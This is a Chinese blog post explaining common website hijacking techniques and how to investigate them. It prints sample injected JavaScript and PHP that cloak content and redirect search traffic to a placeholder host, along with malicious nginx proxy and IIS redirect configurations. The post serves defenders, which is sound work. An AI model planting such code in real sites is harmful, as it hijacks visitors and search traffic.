当前位置:首页 > 安全 > 网络安全 > 正文内容

常见网站劫持案例及解析

3个月前 (04-02)268

攻击者在入侵网站后,常常会通过恶意劫持流量来获取收益,从而实现流量变现。有一些黑帽劫持的手法堪称防不胜防,正常的访问行为很难发现异常。今天给大家分享一下常见的网站劫持手法和排查思路。

我们可以按照基于不同隐藏目的的常见劫持手法,来做一个简单的分类:

  • 1、将爬虫与用户正常访问分开,实现搜索引擎快照劫持

  • 2、将移动端与PC端的访问分开,实现移动端的流量劫持

  • 3、根据用户访问来源进行判断,实现特定来源网站劫持

  • 4、如果获取管理员的真实IP地址,实现特定区域的流量劫持

  • 5、按照访问路径/关键词/时间段设置,实现特定路径/关键词/时间段的流量劫持


基于以上,实现的方式有很多种,比如客户端js劫持、服务端代码劫持、301重定向、恶意反向代理、IIS模块劫持等。


01、客户端js劫持

在网页中插入js脚本,通过js进行url跳转,一般情况下,会通过js混淆加密来增加识别难度。

如下:通过js劫持从搜索引擎中来的流量。

<script>var s=document.referrer; if(s.indexOf("baidu")>0||s.indexOf("soso")>0||s.indexOf("google")>0||s.indexOf("yahoo")>0||s.indexOf("sogou")>0||s.indexOf("youdao")>0||s.indexOf("bing")>0){self.location='http://www.xxxx.com'; }</script>

排查思路:查看网页源代码或者抓包分析http流量,找到源代码中插入的js代码,删除js代码后恢复。

02、服务端代码劫持

网站源码被篡改,在首页或配置文件中引入恶意代码。

如下:通过判断User-agent与Referer,进行快照劫持。

<?phperror_reporting(0);//判断是否为百度蜘蛛,然后进行内容劫持if(stripos($_SERVER["HTTP_USER_AGENT"],"baidu")>-1){$file = file_get_contents('http://www.xxxx.com');echo $file;exit;}//判断是否来自百度搜索,然后进行url跳转if(stristr ($_SERVER['HTTP_REFERER'],"baidu.com")) {Header("Location: http://www.xxxx.com/");//指定跳转exit; }?>

排查思路:查看网站首页引入了哪些文件,依次访问相关的文件源码,确认可疑的代码,去除包含文件后恢复。备份网站源码及文件完整性验证非常重要,可以帮助我们在上万行的代码中快速找到恶意代码。

03、nginx反向代理劫持

以前遇到过一个网站做了网页防篡改,无法通过修改网站源码劫持,攻击者通过修改nginx的配置文件,通过正则匹配url链接,配置proxy_pass代理转发实现url劫持。

location ~ /[0-9a-z]+sc {    proxy_pass  https://www.xxxx.com/;}

排查思路:总结url劫持规律,中间件配置文件也是需要关注的位置。

04、利用301重定向劫持

通过HTTP重定向实现301劫持。

 <httpRedirect enabled="true" destination="http://www.xxxx.com/1.php" childOnly="true" httpResponseStatus="Permanent" />

排查思路:可以检查网站根目录下的配置文件web.config,确认是否有相关设置。

05、IIS恶意模块劫持

这种手法相对比较隐蔽,网站目录中查不到webshell和挂马页面,但使用特定的路径、Referer或者UA访问,页面会加载暗链。

640.webp

排查思路:排查加载的异常dll文件,如没有签名、创建时间不匹配需重点关注。可使用火绒剑或Process Monitor等工具协助排查。


扫描二维码推送至手机访问。

版权声明:本文由零零博客发布,如需转载请注明出处。

分享给朋友:
返回列表

上一篇:QQ上被骗怎么办?

没有最新的文章了...

相关文章

kangle默认错误页面漏洞

kangle默认错误页面漏洞

kangle代理服务器默认错误页面爆出主机名----一个不起眼的漏洞,大佬勿喷!在我们没有配置好404,503,502等错误页面时,默认使用kangle的错误页面,错误页面源代码中包含主机名这时候有人...

常用黑客软件用途分类

常用黑客软件用途分类

一、防范:这是从安全的角度出发涉及的一类软件,例如防火墙、查病毒软件、系统进程监视器、端口管理程序等都属于此类软件。这类软件可以在最大程度上保证电脑使用者的安全和个人隐私,不被黑客破坏。网络服务器对于...

QQ上被骗怎么办?

QQ上被骗怎么办?

在QQ里遇上骗子怎么办?这个时候社工就能派上用场了我们只要能够查到骗子的信息,我们就能使用一些技巧和套路让他把钱还回来社工我们有两种方法:手动社工使用一切方法和套路骗取到骗子信息 简称社会工程学相对麻...

什么是vpn

什么是vpn

我们从英文首字母的角度去看,v,p,n三个字母分别是"Virtual Private Network(虚拟专用网络)"的首字母大写,因为是专用网络所以数据通讯十...

怎么防cc攻击

怎么防cc攻击

要想正真防御住cc攻击,我们首先要明白cc攻击的原理。cc攻击是攻击者操作大量代理来对你进行大量的资源请求,导致网页资源耗尽,然而影响正常用户的访问。那是不是我们可以限制单个用户的请求数量呢?是的,我...

学习黑客的基本环境

学习黑客的基本环境

一、操作系统的选择:我们经常听说黑客酷爱Linux系统,这是因为Linux相对Windows提供了更加灵活的操作方式,更加强大的功能。例如对于IP地址的伪造工作,利用Linux系统编写特殊的IP头信息...